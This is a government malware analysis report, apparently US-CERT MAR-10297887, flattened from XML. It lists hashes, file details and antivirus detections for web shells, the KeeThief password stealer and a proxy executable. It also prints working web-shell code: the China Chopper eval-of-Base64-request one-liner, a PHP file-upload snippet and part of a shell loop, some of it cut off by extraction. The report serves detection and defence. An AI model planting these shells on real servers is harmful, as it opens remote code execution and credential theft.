MAR-10297887.r1.v1
Malware Characterization
//node() | //@*
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
US-CERT
2020-09-14T10:21:43-04:00
BMachine
134
7.1.0
httpgetbin_encoded.vbs
415
ASCII text, with CRLF line terminators
MD5
876f28cbcd4711f0a95b44708d56ce70
SHA1
108bc87632304769aac05609434563448b403e2d
SHA256
40d54609acb3f1024ea91b79ca12ecf855e24ebb46d48db86a7bf34edb91b2db
SHA512
2a6ecf1a5bd8c6d396edd48ff2da32e9beaa578289c8ea3578a6d0b0c6a2c31ca945d156ad0a95a37b56405c6493c3dff8f14ff505fd662b1f98372c0d05b100
SSDEEP
12:KwAJFfyTpHkCGHjBHTeSCqFaKLVe4BURBL1LvxTVTpcqPv:KwAHfAmPDZTeSCqFaKLpubLv1hpcqPv
5.087384
<%try
{
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item["[Redacted]"])),"unsafe");
}
catch(e)
{
}
—End JavaScript Code—
Analysis indicates this file might serve as part of a larger application. The code within the file decodes and executes data using the JavaScript "eval" function. The data is attained via the JavaScript "Request" function indicating the data is pulled from a remote server using the HTTP protocol. It is believed this script is a component of the China Chopper web shell framework.]]>
ui-bg.aspx
178
ASCII text, with no line terminators
MD5
d7b7a8c120b69166643ee05bf70b37e5
SHA1
2ac99374cab70f8be83c48bbf3258eae78676f65
SHA256
553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f
SHA512
8c51c9e3d3d39ec7b961482ed7fc8cde1804ef126b72fce270c6891f64f4371067a65a8be1cbab1ab3c8860a3e2ea206d274f064d54cf2605ffd7eac51fa0515
SSDEEP
3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtGnKRHBIwLWEDp:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5e/GY
5.196436
<%try
{
eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item["ammashnist"])),"unsafe");
}
catch(e)
{
}
—End Embedded JavaScript—
This script is designed to pull JavaScript from an existing "Request Object", Base64 decode and execute it. The contents of the retrieved JavaScript code were not available for analysis. It is believed this web shell is a component of the China Chopper web shell framework.]]>
site.aspx
178
ASCII text, with no line terminators
MD5
20d89fa1df155632fafb2c9fe1a6a038
SHA1
c9cf494475de81dae5a2c54c678b4a518f46b1fe
SHA256
134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13
SHA512
c1d485e34153c50af79e719c4100b988ba4d289578d385d0b30d2225c20b4b8f715d215f609a141030489a337ff36a89b23d4e99bf1895466122fde97e1214f0
SSDEEP
3:aEwJkW9uck1SLxAdRLgyKBM2aBZBQ/tZ/LmKABXXKF2xKYA5eRtJIIDYbwLWEDvR:aEm7EnLgyKBM5Y/tZ6KCHKF2xKt5e/f3
5.201321
—End Data—]]>
vti_cnf.aspx.33154034.compiled
408
XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5
de1cd1c54711544508d157214323af85
SHA1
c33a07965e06280c53e19a5d093983205433843f
SHA256
17f5b6d74759620f14902a5cc8bba8753df8a17da33f4ea126b98c7e2427e79c
SHA512
8265901a684f808c612f9cfcc486aaba923e2cf8ca7fdcd3071e786ad6030c067c4147b7b4e36bb271a5f2b36e0c3f487ceb259e2f00e6afd907ecb6df111a7a
SSDEEP
12:MMHdWFV2q6sX1rMxA0UH17I2fUQ/1OifV2q6sW6/1:JdmsvkrGOnfUcBsve/1
5.120655
App_Web_tcnma5bs.0.js
8401
UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5
8495abfd7356f75ad7006d2ab42d4bee
SHA1
3736a085f9fe515dc7d12bbf2a1474bdd3d8d4d2
SHA256
5e0457815554574ea74b8973fc6290bd1344aac06c1318606ea4650c21081f0a
SHA512
8c5fec8455ad0d529030f19626b8fe55b05f6f24b4fee1378e2d6ffa7185c5f2854074cfc30518721892f39985dc5742e81f875d5469101967a62fdc26d1cb36
SSDEEP
192:VkjEVXTaaVEDAQpovRpY0NHMdWoEsxpKL:VkjEVXTaaEDAQM3NHMdJEIp4
5.246768
App_Web_tcnma5bs.dll
13312
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5
18f2cf11b940a62d63fd757e20564ec6
SHA1
6fbd38aff374974c59ccca7efd8e1a3205c69ce9
SHA256
99344d862e9de0210f4056bdf4b8045ab9eabe1a62464d6513ed16208ab068fc
SHA512
190c3cb0a09ce111135d0a98d10922650c28eb895583d98b2015b67e71a2131f824863cb4402d7627648aa0660ad5eaab63ed7cae8a9a54646d09340b71019d7
SSDEEP
384:4PojaxtaTXMzS/X44tIItLzxqIj3tccsJY5Ohmqw/4JHuNkLpe+k:4PojaxyXM+/X44K2
Microsoft Visual C# v7.0 / Basic .NET
5.14385
4
2020-06-07 06:21:21-04:00
512
MD5
83b4ba5ffed3f61f2c3c07cbfb9e4645
2.606561
0.0.0.0
App_Web_tcnma5bs.dll
App_Web_tcnma5bs.dll
.text
11264
5.517535
MD5
9f9a21c74d71b03386ee22a566a1170d
.rsrc
1024
2.512896
MD5
cb5b712bb6ddf459a6a953c98373b5f6
.reloc
512
0.081539
MD5
dbd0e57bcdedc0733290c5195a01ad35
Related_To
App_Web_tcnma5bs.pdb
24064
MSVC program database ver 7.00, 512*47 bytes
MD5
3be9b7030389ad5e106f169fbe7b7458
SHA1
224448b5840b71ca07c144d3f525b8971c17d4a7
SHA256
28bc161df8406a6acf4b052a986e29ad1f60cbb19983fc17931983261b18d4ea
SHA512
bf8b7bc82be4803099cfe956edb2699c441705955e4d7e3822501940a8e572dafcf1906c797cea8551f3407059bad03c9196bd1432038c095f131bf88bd64bbc
SSDEEP
384:ihIBU3Xo3Z3oTTi3aljxTi3aljKITi3aljs8Ti3aljUTi3aljBTi3alj1Ti3aljb:ihIBU4Zox1fLOx5H1bX0b6UW
3.924351
Related_To
svchost.exe
10532864
PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
MD5
c8bc262d7126c3399baaec3bee89d542
SHA1
c94a0f902b3b8cc4ca5e4cc9004ac9eaa4614699
SHA256
55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
SHA512
cf7b89d9658e618cb4f590b13bd6a6e5abcba0cddca625c7aeaaafb5ef8821a7a60620b789de4abd5d4505ffe3e9c13ad3bf1173f21e1735df5103f06f7270a9
SSDEEP
196608:3YHvhq3/BuNnKkOeXtqugiGk9FPHxgc/uA63+w0IUX:kQBuVku1G+
6.107183
6
1969-12-31 19:00:00-05:00
1536
MD5
86ff3a53ecd56eaa856f8c7c28d0a8f1
1.263684
.text
4546560
5.826487
MD5
26ef590b60778bfdd9bfcbb24d832f94
.rdata
5612032
5.660454
MD5
abdb24e1a410aa5fba49a4d1fe6a21bb
.data
370688
6.023192
MD5
2e993dbff4bcb21d52aa1897a4e2604e
.idata
1536
3.442601
MD5
f006061c21d3eee457ffe5e2c69cba8e
.symtab
512
0.020393
MD5
07b5472d347d42780469fb2654b7fc54
dllhost.dll
226
ASCII text, with CRLF line terminators
MD5
14df2e509b6ee8deb3ce6ba3b88e3de0
SHA1
80190bdddf70a79a1735136f81309219c937458d
SHA256
f7ddf2651faf81d2d5fe699f81315bb2cf72bb14d74a1c891424c6afad544bde
SHA512
6a32f2715d554c11eb0a50e39540c9e68bbb387b8a3aa1dfe4604ce6ed22a075fae0c1b3dfd07468746f4d782b1bff203f9036acaff9d6bbd2ab4c0c23b58d08
SSDEEP
6:eBh3BnEWovv5O4WaundbHAVSVDOUqxTWi:enlcO4WhcSVHqxii
5.081345
kee.ps1
357631
awk or perl script, ASCII text, with very long lines
MD5
3a83cad860a688e1f40683142280a67b
SHA1
d8ad2de372296501c3eb3aa0e053708eb3914113
SHA256
913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0
SHA512
a7afad9c446e55e25ec6289595ebeba469df0ccbc1863c437acf64e63c13b497699804de5248664d5cb78c527ffb9d1415c36a182d32002019cba2e461bb88c3
SSDEEP
6144:SJU/ny0KiejKvsM7fz0QVd/eHuwF1U1zDtyftQQKasiaUKGY4RpmOHYqmqEqJ7jO:sIyCVjz0QpcU9QlTsZb
6.018326
Related_To
KeeTheft.dll
738304
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5
dc8a91125f273090cd8d76e9e588a074
SHA1
3455ecca61a280a1056adb69077e0c652daa3516
SHA256
10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334
SHA512
dc25e2ff93871edeb751e99cafe0717163817bfa85bd41c941c1c8b1b5ad2c63b9935060475b65dda69edce358f2759160ce94ad663c041bd41dbbd48e464cb4
SSDEEP
12288:NxOU+wucIYOW1ENXKUEHI7apPYEMMIjS3K9TodHNSIIcOECQ:NETcIYOWCNXKUEHI7apPYEMJ9TgHDpC
6.023616
4
2016-07-11 14:54:24-04:00
512
MD5
cb77191ad61291924938362fbb902f32
2.783814
KeeTheft
1.0.0.0
KeeTheft.exe
Copyright © 2016
KeeTheft.exe
KeeTheft
1.0.0.0
.text
735744
6.030226
MD5
1fb4a5b09d9141362ed994c8a99b3cf5
.rsrc
1536
4.076679
MD5
2801de31bb6a6306f169ef81e5589521
.reloc
512
0.10191
MD5
ecf88595c12869be20d521f1934da506
Characterized_By
Characterized_By
Characterized_By
Characterized_By
Related_To
Figure 1
Figure 2
Figure 3
Figure 4
0)
{
echo "Error: " . $_FILES["file"]["error"] . "
";
}
else
{
echo "FILENAME: " . $_FILES["file"]["name"] . "
";
echo "FILETYPE: " . $_FILES["file"]["type"] . "
";
echo "FILETYPE: " . ($_FILES["file"]["size"] / 1024) . " kB
";
echo "FILETEMPPATH: " . $_FILES["file"]["tmp_name"] . "
";
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
}
?>
df5bd34799e200951fcce77c1c0b42af.php
585
PHP script, ASCII text
MD5
b3b1dea400464ab5dd55e44766357957
SHA1
507a04d3faed99cee089da042913d63f1813fc2a
SHA256
51e9cadeab1b33260c4ccb2c63f5860a77dd58541d7fb0840ad52d0a1abedd21
SHA512
f7c21a4171942edd7e0d4ab7c0b3a3a1666a3dbbed14da6af4ae3c41c7607301c0c3bc83782e22c47fe40b5297a9c1374d645d04ce3b22cebf5a54d2d92ed5bb
SSDEEP
12:yDsNaficuJwHCaBzVBbgKOBUbC3c2vaveaXivglQEyKzbShL:4sCicuJwiaRVVeubCs+ieaXiY1HShL
5.136531
<%try {eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String(Request.Item["[Redacted]"])),"unsafe"); } catch(e) {}%>
—End Extracted JavaScript—]]>
df5bd34799e200951fcce77c1c0b42af_y.php
28
PHP script, ASCII text
MD5
e11f9350ced37173d1e957ffe7d659b9
SHA1
ec6d63fd5695c470bc3daea500b270eca85e81f4
SHA256
547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c
SHA512
ecd2ae19d5b3264821a1d88a265973b32724d2fc85b4225a23d4bc0c1aad6e8280a78de1f9024a19461a1c1b9209222eb51cb57f980c11a862eb78c82d29a7e1
SSDEEP
3:3/a4nL:ycL
4.521641
df5bd34799e200951fcce77c1c0b42af_z.php
30
PHP script, ASCII text
MD5
8f9567ca566ab5f79081d5d17c79ee41
SHA1
01c3da91407c43d9edee751bbd2e30e081165fdc
SHA256
b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249
SHA512
45ba8f2dac9cf0982937feb42dd6a782e84a76fae84d8168d170e52908bc40033a7fab58395c4247093af3b3cb38532563aac00a153641420b95dabb91976e99
SSDEEP
3:3/MJHo6:0JI6
4.640224
prev_sh
872
Rich Text Format data, version 1, ANSI
MD5
ac07005f06ac63e5b1b0c1cd15a7a060
SHA1
74fe38fb9b63e3d1ff112567d770aef118a31195
SHA256
2944ea7d0045a1d64f3584e5803cbf3a026bd0e22bdf2e4ba1d28c6ad9e57849
SHA512
f2560ae09815a3011086ec1ecbdfb0102d1063dcb64a81cfb4f0d18307f0851c6f4738103024e172adb71f14982c5edcc88592f9e03f04605f8a2f86948050ba
SSDEEP
24:EnAWZJMOvOIBCotIYZa/UKt0K7uxuOv69p:EnAWZOkOm7tIYZa/UbjUkep
5.3867
—End File Data—
As illustrated within this data, the POST parameter utilized to deliver data to the script block is expected to be "citrix@[Redacted]". It is believed this script is related to the Tiny web shell.]]>
tiny_webshell
402
Rich Text Format data, version 1, ANSI
MD5
82e6e545c9863ed9f0df1e78d2457d13
SHA1
fdc411014e747715a2d6de93723865ac5134b600
SHA256
b36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a
SHA512
cbe7374679872f635564b6da357b806ffd11f86881ea9fe9286682a73e49b152b88b01c9f6c872fb3ac04044b5d2955c92b03793877e6ecbc19d775707f28824
SSDEEP
6:L4vrWK+dSQSm+BhYrJDeSykilDo5WZuXP7SX8R6H4cYzat7qq4+u13HfEW2A6xQ0:HKUSmsY+1AWZuDSXA6/YXF3M/Qq3
5.136055
30) {
$continue = false;
_log("Max inactivity time exceeded");
break;
}
// _log(stream_get_contents($pipes[1]));
// next round
if ($ss === 0) continue;
if ($ss === false) {
_log("\nServer shutting down");
$continue = false;
break;
}
if ($ss < 1) {
_log("\nNothing to do");
continue;
}
—End Extracted Code—
Figures 5 and 6 contain similar code from the open source Chunky Tuna web shell.]]>
content
5599
PHP script, ASCII text
MD5
ce868f9ed3ebd9036456da37749ab7b9
SHA1
6099d6e21fd81c2fb85e9b157f64d2cad8fec310
SHA256
8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3
SHA512
e69966437bb4c3a819a425c6d8197fe8b7a01d2396eaa9d8f88312834e85eba8bb53f36aceefe306cbc3affe6e843afc2a833d89f02a5e7392dd31140f07b701
SSDEEP
96:NqNB3EXRKYIkbu0J5vmkI0K1sZMHXN+XNyBa9M6XN2XN7Emf+qsTMUoPk4xe0tM9:O3EhFIcT+sKSZMdMyBCMQk7d5I4xptM9
5.298102
Characterized_By
Characterized_By
Figure 5
Figure 6
content
365
PHP script, ASCII text, with CRLF line terminators
MD5
750b1bf7269ffc5860166efa8af6b34e
SHA1
f4d152a700d93703592dc3652ff7b52ef00b4f7e
SHA256
3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c
SHA512
fcae4efb50a6e72363edfd822939ff9204ca2368963ad825e5c8b5a256255e93bc8f556cd91aa4629c53a117892e03d95aad9c4716ded27300b4d68aabd3bb4e
SSDEEP
6:99YpbSYDFYE9LO3b6bLAztLUJD/9RH80Ab6bLAztLUJOdLGX80Ab6bLAztLUJI5t:96RSurpOryLAztQ7H0WLAztzGX0WLAz/
5.142417
content
57
PHP script, ASCII text, with no line terminators
MD5
fd6c1e1fbe93a6c1ae97da3ddc3a381f
SHA1
a5225159267538863f8625050de94d880d54d2d4
SHA256
4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
SHA512
ea392b3dd9c323ae5e41d68394a56bb13914e9311f2d98648c9b5560af3bb9f85b4ac4d5a947bce5658fa230b3902fb574e5247c626643150dd8b6087f782ec1
SSDEEP
3:E1uWATR7cNT2xrXMnFNXC4/:EEW2A6xQnqO
4.922815
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
d7b7a8c120b69166643ee05bf70b37e5
SHA1
2ac99374cab70f8be83c48bbf3258eae78676f65
SHA256
553f355f62c4419b808e078f3f71f401f187a9ac496b785e81fbf087e02dc13f
NCCIC
2020-09-14T14:52:21+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
20d89fa1df155632fafb2c9fe1a6a038
SHA1
c9cf494475de81dae5a2c54c678b4a518f46b1fe
SHA256
134ef25d48b8873514f84a0922ec9d835890bda16cc7648372e014c1f90a4e13
NCCIC
2020-09-14T14:52:21+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
c8bc262d7126c3399baaec3bee89d542
SHA1
c94a0f902b3b8cc4ca5e4cc9004ac9eaa4614699
SHA256
55b9264bc1f665acd94d922dd13522f48f2c88b02b587e50d5665b72855aa71c
NCCIC
2020-09-14T14:52:21+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
3a83cad860a688e1f40683142280a67b
SHA1
d8ad2de372296501c3eb3aa0e053708eb3914113
SHA256
913ee2b048093162ff54dca050024f07200cdeaf13ffd56c449acb9e6d5fbda0
NCCIC
2020-09-14T14:52:21+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
dc8a91125f273090cd8d76e9e588a074
SHA1
3455ecca61a280a1056adb69077e0c652daa3516
SHA256
10836bda2d6a10791eb9541ad9ef1cb608aa9905766c28037950664cd64c6334
NCCIC
2020-09-14T14:52:21+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
e11f9350ced37173d1e957ffe7d659b9
SHA1
ec6d63fd5695c470bc3daea500b270eca85e81f4
SHA256
547440bd037a149ac7ac58bc5aaa65d079537e7a87dc93bb92edf0de7648761c
NCCIC
2020-09-14T14:52:22+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
8f9567ca566ab5f79081d5d17c79ee41
SHA1
01c3da91407c43d9edee751bbd2e30e081165fdc
SHA256
b443032aa281440017d1dcc3ae0a70d1d30d4f2f2b3f064f95f285e243559249
NCCIC
2020-09-14T14:52:22+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
82e6e545c9863ed9f0df1e78d2457d13
SHA1
fdc411014e747715a2d6de93723865ac5134b600
SHA256
b36288233531f7ac2e472a689ff99cb0f2ac8cba1b6ea975a9a80c1aa7f6a02a
NCCIC
2020-09-14T14:52:22+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
ce868f9ed3ebd9036456da37749ab7b9
SHA1
6099d6e21fd81c2fb85e9b157f64d2cad8fec310
SHA256
8c9aeedeea37ee88c84b170d9cd6c6d83581e3a57671be0ba19f2c8a17bd29f3
NCCIC
2020-09-14T14:52:22+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
750b1bf7269ffc5860166efa8af6b34e
SHA1
f4d152a700d93703592dc3652ff7b52ef00b4f7e
SHA256
3b14d5eafcdb9e90326cb4146979706c85a58be3fc4706779f0ae8d744d9e63c
NCCIC
2020-09-14T14:52:22+00:00
MD5 and SHA1 of Malicious File
Malware Artifacts
MD5
fd6c1e1fbe93a6c1ae97da3ddc3a381f
SHA1
a5225159267538863f8625050de94d880d54d2d4
SHA256
4a1fc30ffeee48f213e256fa7bff77d8abd8acd81e3b2eb3b9c40bd3e2b04756
NCCIC
2020-09-14T14:52:22+00:00
MAEC Characterization of d7b7a8c120b69166643ee05bf70b37e5
Symantec
Hacktool.Jsprat
Sophos
Troj/WebShel-F
ESET
ASP/Webshell.T trojan
trojan
webshell
MAEC Characterization of 20d89fa1df155632fafb2c9fe1a6a038
Symantec
Hacktool.Jsprat
Sophos
Troj/WebShel-F
ESET
ASP/Webshell.T trojan
MAEC Characterization of c8bc262d7126c3399baaec3bee89d542
K7
Riskware ( 0040eff71 )
Sophos
App/FRProxy-A
MAEC Characterization of 3a83cad860a688e1f40683142280a67b
Cyren
Trojan.NBMZ-8
BitDefender
Application.Hacktool.TJ
ESET
MSIL/PSW.KeeThief.A trojan
Ikarus
Trojan.PowerShell.Pklotide
MAEC Characterization of dc8a91125f273090cd8d76e9e588a074
McAfee
GenericRXIL-CE!DC8A91125F27
K7
Password-Stealer ( 005253fd1 )
Symantec
Trojan.Gen.MBT
BitDefender
Gen:Variant.Ursu.299323
Microsoft Security Essentials
PWS:MSIL/KeeThief
Emsisoft
Gen:Variant.Ursu.299323 (B)
Avira
TR/PSW.KeeThief.vmqvn
Ahnlab
Trojan/Win32.Tiggre
ESET
a variant of MSIL/PSW.KeeThief.A trojan
Ikarus
Trojan.MSIL.PSW
MAEC Characterization of e11f9350ced37173d1e957ffe7d659b9
Microsoft Security Essentials
Backdoor:PHP/Dirtelti.MTG
ESET
PHP/WebShell.NGI trojan
backdoor
MAEC Characterization of 8f9567ca566ab5f79081d5d17c79ee41
Microsoft Security Essentials
Backdoor:PHP/Dirtelti.MTG
MAEC Characterization of 82e6e545c9863ed9f0df1e78d2457d13
Microsoft Security Essentials
Backdoor:PHP/Chopper.C!dha
ESET
PHP/WebShell.NBV trojan
remote-access-trojan
MAEC Characterization of fd6c1e1fbe93a6c1ae97da3ddc3a381f
Microsoft Security Essentials
Backdoor:PHP/Dirtelti.MTF
ESET
PHP/WebShell.NBV trojan
NANOAV
Trojan.Html.Backdoor.fqkken
10297887.r1.v1
Malicious Code
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected
Malicious Artifact Detected